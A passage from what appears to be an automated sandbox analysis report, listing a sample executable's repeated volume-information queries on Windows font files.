Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
